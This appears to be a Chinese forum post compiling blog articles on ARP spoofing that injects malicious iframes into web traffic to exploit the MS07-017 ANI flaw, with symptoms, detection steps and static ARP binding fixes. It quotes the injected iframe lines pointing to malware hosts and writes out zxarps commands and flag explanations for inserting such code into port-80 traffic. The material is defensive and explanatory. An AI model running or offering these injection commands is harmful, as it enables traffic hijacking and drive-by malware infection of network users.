饱受ARP攻击和挂马网页自动下载木马之苦的朋友们进来看

饱受ARP攻击和挂马网页自动下载木马之苦的朋友们进来看
“木马猛于虎也”，这句话用在现在的网民（包括我这样的老菜鸟）身上真是再贴切不过了，经常发现有程序会自动下载病毒和木马程序，却无可奈何，或者经常遇到ARP攻击也束手无策。不过最近在浏览金山毒霸工作人员铁军的博客时候却有了可喜发现，好东西要分享给大家o(∩_∩)o…，请大家看下面的内容，有些长，但是绝对有效，看完了别忘了顶帖哦o(∩_∩)o

下面的内容是在金山毒霸的铁军的blog里面摘抄的，对ARP病毒攻击和Risk.exploit.ani病毒的处理给了很好的解决建议，我转载出来大家参考下：

最近用户咨询Risk.exploit.ani病毒的问题比较多，该病毒是利用微软MS07-017中的动态光标处理漏洞的畸形ANI文件， 被某些已经挂载木马的网页自动下载。当用户的浏览器打开带有相关恶意代码的网页，将畸形ANI文件下载到本机临时文件夹中时，这时，毒霸的实时防毒和网页监控会进行报警，由于该文件被IE占用，所以某些情况下毒霸是无法立即删除的。但是毒霸已经专门针对此病毒进行了免疫处理，用户即时没有安装相关漏洞补丁，只要启用毒霸监控，也不会中毒。并且，针对这些文件，毒霸还进行了延迟删除处理，在下次重启系统时，这些被锁定的文件会被自动，下载的畸形ANI文件将不起作用，也就不会通过ANI漏洞去下载真正的病毒木马了。

有两种情况，需要注意：

1.对于病毒本身而言，清除是简单的，关闭浏览器，然后清空IE临时文件夹，补丁编号MS07-017 KB912919，详细情况见http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx ，如果是本机感染病毒，可以根据日志提取样本。

2.局域网其他计算机感染病毒进行会话劫持攻击，最近的咨询也比较多，上面的处理方法就无效了。因为病毒本来不一定在当前这台客户机上。某些病毒或者木马利用ARP欺骗等手段，在用户收到的网络数据包中自动插入i-frame-X代码，代码指向利用MS07-017漏洞的网址。使得中毒用户，以及局域网中受到此中毒电脑的欺骗攻击的用户，在上任意网站的时候都会提示存在该病毒。通俗点说，就是局域网某个计算机感染病毒或者木马，该病毒发送arp欺骗，然后在所有的网页访问的tcp数据中插入一段i-frame-X代码，只要网内的计算机通过网关上网，所有的网页都会跳转到i-frame-X制定的网页，该网页是存在畸形ANI文件，所以毒霸会不断的报警。显示的Risk.exploit.ani只不过是一种表现，就像木马下载器和木马，其原理和功能有天壤之别。对于该类情况，也比较容易判断，如果是局域网用户，一般其他的电脑也存在该问题，而且是访问任意网站都会存在该提示。由于不是本机感染病毒，所有对该计算机进行杀毒，扫描提取样本可能都是无效的。用户需要找到的是发送arp欺骗，从而导致出现该现象的机器，这个需要网管抓包来分析，用户个人是无法完成的。当然无论如何，首要解决的是安装补丁。而对于第二种情况，也就是现在局域网中感染ARP 病毒的情况，由于此种现象目前非常普遍，清理和防范都比较困难，给不少的网络管理员造成了很多的困扰。下面就是处理这个病毒的一些参考方法，供大家参考：

ARP 病毒的症状：

有时候无法正常上网，有时候有好了，包括访问网上邻居也是如此，拷贝文件无法完成，出现错误；局域网内的ARP 包爆增，使用Arp 查询的时候会发现不正常的Mac 地址，或者是错误的Mac 地址对应，还有就是一个Mac 地址对应多个IP 的情况也会有出现。

ARP 攻击的原理：

ARP 欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警:第一以太网数据包头的源地址、目标地址和ARP 数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC 数据库内，或者与自己网络MAC 数据库MAC/IP 不匹配。这些统统第一时间报警，查这些数据包(以太网数据包)的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。现在有网络管理工具比如网络执法官、P2P 终结者也会使用同样的方式来伪装成网关，欺骗客户端对网关的访问，也就是会获取发到网关的流量，从而实现网络流量管理和网络监控等功能，同时也会对网络管理带来潜在的危害，就是可以很容易的获取用户的密码等相关信息。

处理办法：

通用的处理流程：

1 .先保证网络正常运行

方法一：编辑个***.bat 文件内容如下：

arp.exe s

**.**.**.**（网关ip） ****

**

**

**

**（

网关mac 地址）

end

让网络用户点击就可以了!

办法二：编辑一个注册表问题，键值如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"mac"="arp s

网关IP 地址网关Mac 地址"

然后保存成Reg 文件以后在每个客户端上点击导入注册表。

2 找到感染ARP 病毒的机器。

a：在电脑上ping 一下网关的IP 地址，然后使用ARP －a 的命令看得到的网关对应的MAC 地址是否与实际情况相符，如不符，可去查找与该MAC 地址对应的电脑。

b：使用抓包工具，分析所得到的ARP 数据报。有些ARP 病毒是会把通往网关的路径指向自己，有些是发出虚假ARP 回应包来混淆网络通信。第一种处理比较容易，第二种处理比较困难，如果杀毒软件不能正确识别病毒的话，往往需要手工查找感染病毒的电脑和手工处理病毒，比较困难。

c：使用mac 地址扫描工具，nbtscan 扫描全网段IP 地址和MAC 地址对应表，有助于判断感染ARP 病毒对应MAC 地址和IP 地址。

预防措施：

1，及时升级客户端的操作系统和应用程式补丁；

2，安装和更新杀毒软件。

4，如果网络规模较少，尽量使用手动指定IP 设置，而不是使用DHCP 来分配IP 地址。

5，如果交换机支持，在交换机上绑定MAC 地址与IP 地址。（不过这个实在不是好主意）

还有，使用金山毒霸的朋友要升级病毒库，可以很好的进行防范；此外也可以下载金山专杀工具，进行病毒的扫描查杀，效果也不错，最主要的工具是免费的，呵呵。可以来这里下载相应的工具：http://www.duba.net/default.shtml

Ps：我不是金山的枪手，但是我愿意去做金山毒霸的宣传者，金山毒霸其实一直在真正为用户着想，去努力，这种精神和态度是值得肯定的。至少看他们的文章和博客还是很让我感动的，呵呵

------------------------------------------------------------------------------------------------

服务器被ARP攻击，网站被挂马
　　今天凌晨一打开自己的网站，卡巴就弹出来说有病毒，报告为“恶意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”，然后网页显示的也有问题，最上方居然裸露出来了一小段源码，于是马上查看源码，发现代码居然被改了。

　　最上面变成了：

　　<iframe src='httP://web.21575.com/113/' height=0 width=150></iframe>

　　我的第一反应就是网站被人挂马了，首先想到的是不是程序有漏洞，被人传了木马，赶紧用FTP连上，检查ASP文件，发现所有的ASP文件都没有是今天修改过的，模板系统也没有问题，这下我真的不知道怎么办了。都搞不清楚问题出在哪里。。。。

　　然后我对挂马的这个网站来了兴趣，在百度里一搜“21575”，

　　http://www.baidu.com/s?word=domain:21575&ie=gb2312&ct=0

　　发现有一条的结果的标题是“服务器被ARP欺骗，大家请不要访问我的站”，看了一下那条帖子，然后又联想到昨天下午收到了IDC的短信，提醒说最近ARP病毒泛滥，于是我马上就想到应该是受到ARP攻击了。

　　下午我还去IDC的网站上看了一下，有一篇关于防范ARP攻击的公告，还提供了ARP防范工具下载，赶紧下了，然后安装。

　　这个软件是ARP防火墙（Anti ARP Sniffer），下载地址：http://www.antiarp.com/newsopen2.asp?ArticleID=24

　　官网：http://www.antiarp.com/

　　刚装上以后ARP防火墙启动不了，于是重启服务器，顺利启动了，然后就看到ARP防火墙提示受到ARP攻击了，还能跟踪到攻击的来源IP。

　　装上ARP防火墙以后，再访问网站，一切正常。

　　MUD，看来ARP攻击才是最高明的攻击方法嘛，MUD！

　　ARP攻击的先进性就好比DNS劫持一样，处于最上层。网页实际的文件并没有改变，但是发送给浏览器以后就变了样了，被病毒给改了。

　　相关知识：

　　ARP即Address Resolution Protocol，将网络IP地址映射至网卡硬件MAC地址的协议。一般危害为欺骗同网段内的其他服务器地址，截获其数据报文、监听数据传输、盗取帐号信息，甚至对来访数据包进行欺骗和伪造。该病毒发作方式为：网段内一台服务器中此病毒，病毒将以此机器作为肉鸡，对同网段服务器进行数据劫持和欺骗。类似于夺取同段内的其他服务器的IP，导致合法服务器无法正常通讯。此病毒还可对网关地址进行欺骗，造成此网段所有IP地址都无法正常解析。以致网络大面积瘫痪。

　　我这次的情形就是上面说的“对来访数据包进行欺骗和伪造”、“对同网段服务器进行数据劫持和欺骗”，ARP防火墙查到了攻击源，是同网段内的一台机子，我看了一下那台机子，居然是用IIS的默认站点建的站（可以直接用IP访问），估计系统漏洞不少，被人攻击中毒了，然后连累到我们同网段内的其他无辜的用户。

　　安全很重要！尤其是在最近病毒木马泛滥的日子里。

------------------------------------------------------------------------------------------------

ARP攻击，恶意代码写入网络数据包
之前我们发表过一篇日志小心恶意网址a.d3a.us，今天上午发布了其中病毒的解决方案，下午的时候我们发现在这个病毒下载的其它恶意程序里有使用ARP欺骗方式“挂马”的恶意程序。

利用的工具是zxarps，Build 01/17/2007 By LZX（还挺新的，要尽早扼制才行）。病毒一边不断地清ARP表（arp.exe -d），一边向指定IP段指定端口发送攻击命令：
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -reset
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -port 80 -insert "<iframe src=http://a.d3a.us/1/ width=0 height=0 frameborder="0"></iframe>"
欺骗指定IP段内的客户端，插入恶意代码到数据包中，然后返回给被欺骗客户端，客户端浏览网页时感觉就像网站被挂马一样。如果被这ARP欺骗攻击导致局域网内多台机器都中了这个东西，想象这个局域网会乱到什么程度，清除起来也不会很方便了吧。

附一点说明：
引用
-idx [index]　　　　网卡索引号
-ip [ip]　　　　　　 欺骗的IP,用'-'指定范围,','隔开
-port [port]　　 　 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口
-reset　　　　　　　恢复目标机的ARP表
-insert [html code] 指定要插入html代码
“挂马”的方式方法越来越多，继修改网页文件流行后，这种“ARP挂马”也跃跃欲试，局域网啊！

而且而且，现在的病毒和木马群分工越发明确，比如某邮件蠕虫，附在邮件附件里的是downloader，down下来的有专门负责发送邮件的、有专门负责收集地址的、有专门检查自己更新的、还有专门进行DDoS的；木马群也是这样，一个恶意网站down一个木马，它再down一堆其它木马，有盗Q的、有盗网游的、有专门发尾巴的，还有专杀反病毒软件清道的，还有还有……专门负责广告推广的！唉，互联网啊！

------------------------------------------------------------------------------------------------

又见 ARP 攻击会话劫持挂马的黑客程序

病毒详细信息

病毒全名 Win32.Hack.ArpSpoon.h

病毒长度 26112

威胁级别 ★★

病毒类型 黑客程序

病毒简介

这是一个ARP欺骗病毒，它能向同网段所有计算机发送ARP欺骗数据包，挟持了该网段内的网关，使经过网关的每个数据包都经过受病毒感染的计算机，该计算机会寻找HTTP响应包，在包内加入挂马的代码。

技术细节

1、ARP欺骗

病毒会枚举本计算机所在的网段，并发送经过伪造的ARP(Address Resolution Protocol)数据包，挟持了本网段的网关地址，使本网段的所有的数据包都经过该计算机。

2、修改特定数据包

病毒会对所有的数据包进行分析，过滤出HTTP应答包，并在包里面插入一段代码，使用户看到的网页最前面被插入以上代码，该网页会利用ANI漏洞(MS07-017)下载并运行木马程序，建议用户及时补上计算机上已知的漏洞。

注：

利用ARP欺骗挂木马并没有真正的修改网页服务器上的页面内容，它是在数据包传输中非法修改里面的数据，强行插入病毒代码，而且影响范围相当的广，若一个空间服务商的一台服务器中毒，就会使得该服务器所在的网段的传输的数据包都被修改，很可能会影响到数以百计的网站空间。而且寻找ARP欺骗的源头并不容易查出，所以这种攻击方式具有极大的危害性。建议网络管理员使用静态的路由表来管理网络的MAC与IP地址。

------------------------------------------------------------------------------------------------

现在知道了解决办法：

设置静态网关和局域网内机器的IP及MAC地址绑定，我做了一个Bat文件，如下：

Anti-ARP.bat
arp -d
arp -s 192.168.0.1 00-01-02-03-04-35
arp -s 192.168.0.2 00-11-0a-11-23-45
arp -a
pause